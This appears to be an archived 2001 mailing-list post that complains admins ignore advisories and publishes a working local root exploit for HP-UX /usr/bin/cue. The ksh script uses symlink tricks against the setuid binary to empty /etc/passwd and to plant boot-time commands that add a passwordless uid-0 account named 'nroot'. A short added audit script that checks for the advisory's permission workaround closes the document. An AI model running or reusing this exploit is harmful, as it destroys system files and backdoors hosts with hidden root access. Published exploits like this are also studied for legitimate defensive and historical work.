Hi there,

One of the major problems I see with admins/security nowadays is that admins don't secure their hosts: they install patches... which is slightly different.

It reminds me of this (very) old advisory which was issued by HP in 1997 (!!!) about /usr/bin/cue. In the "Workarounds/Solution" section, the advice was to:

  # chmod 400 /usr/bin/cue

or

  # chgrp trusted /usr/bin/cue
  # chmod 4750 /usr/bin/cue

...but admins just don't read advisories. They patch...

...and there was no patch for cue. This explains why most big HPUX servers are still vulnerable.

I don't know the reason why, but I think I've never seen any exploit for this one. Let's remember the "Scriptors of Doom" days!

Local root exploit below.

Emilie Chang.

----------

#!/usr/bin/ksh
##
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
##
## This is just a proof of concept. Don't use for malicious
## purpose. If ever you decide to run that script, please
## read the code carefully before!
##
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
## people. Good job sweethearts.
##
## Old-styled exploit, tested on HPUX 10.20, model 899
## Warning : /usr/bin/cue exists on HPUX 800 models only
##
## Let's test the model by the way...
##
MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
export MODEL
if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
then
    echo "Your host doesn't look like a HPuX 8** model, stopping now."
    exit
fi
##
## Test whether /usr/bin/cue exists or not...
##
if [ ! -u /usr/bin/cue ]
then
    echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
    exit
fi
##
## Well you passed the above tests. Going on playing.
## Creating a file within /etc/rc.config.d : It will
## be executed at next reboot (which might happen
## soon)
##
TTY=`tty | awk -F '/' '{print $3}'`
export TTY
TERM=whatevah
export TERM
umask 000
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null
##
## Inserting evil root account within /etc/passwd
##
echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit
##
## Now saving the passwd file, which we are about to empty
##
cp /etc/passwd /tmp/passwd
##
## passwd file destruction
## (SOMEONE SET US UP THE BOMB !!)
##
rm IDMERROR.$TTY
ln -s /etc/passwd IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null
##
## *POOF*, now that the /etc/passwd file is emptied, admin
## MUST reboot to get things done.
##
echo "Your nroot account will be created within /etc/passwd"
echo "with no password. Remove it asap, it's just a proof"
echo "of concept!"
# The end.
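A check for the 1997 advisory workaround quoted above (chmod 400, or chgrp trusted plus chmod 4750), added here as an example and not part of Emilie Chang's post: it reports whether a setuid binary is still executable by arbitrary local users, which is the condition the script above depends on. It assumes only POSIX sh, `test -u` and `ls -ld` (so it runs on HP-UX and Linux alike); the scratch files in `demo()` are constructed stand-ins for /usr/bin/cue.

```shell
#!/bin/sh
# Added audit helper (not from the original post). Reports whether a setuid
# binary is still reachable by arbitrary local users, i.e. whether the HP
# advisory workaround (chmod 400, or chgrp trusted + chmod 4750) is in place.
# Return status: 0 = absent, not setuid, or not world-executable (workaround OK)
#                1 = setuid and executable by "other" (still exposed)
setuid_exposed() {
    path=$1
    if [ ! -e "$path" ]; then
        echo "$path: absent"
        return 0
    fi
    if [ ! -u "$path" ]; then
        echo "$path: not setuid"
        return 0
    fi
    # Parse the 10-character mode string from ls -ld instead of stat(1),
    # whose options differ between HP-UX and GNU. Column 10 is "other" execute.
    mode=$(ls -ld "$path" | awk '{print $1}')
    owner=$(ls -ld "$path" | awk '{print $3}')
    other_x=$(printf '%s\n' "$mode" | cut -c10)
    if [ "$other_x" = "-" ]; then
        echo "$path: setuid $owner, not world-executable ($mode): workaround applied"
        return 0
    fi
    echo "$path: setuid $owner, world-executable ($mode): still exposed"
    return 1
}

# Self-contained demonstration on constructed files in a scratch directory
# (the real target on an HP 9000/800 would be /usr/bin/cue).
demo() {
    d=$(mktemp -d)
    : > "$d/cue"
    chmod 4755 "$d/cue"                 # as shipped: setuid, world-executable
    if setuid_exposed "$d/cue"; then before=ok; else before=exposed; fi
    chmod 4750 "$d/cue"                 # advisory workaround applied
    if setuid_exposed "$d/cue"; then after=ok; else after=exposed; fi
    rm -rf "$d"
    echo "before=$before after=$after"
}

demo
```

On a real host, call `setuid_exposed /usr/bin/cue` directly; a non-zero return is the case the advisory tells you to fix.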
This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 12:51:57 PDT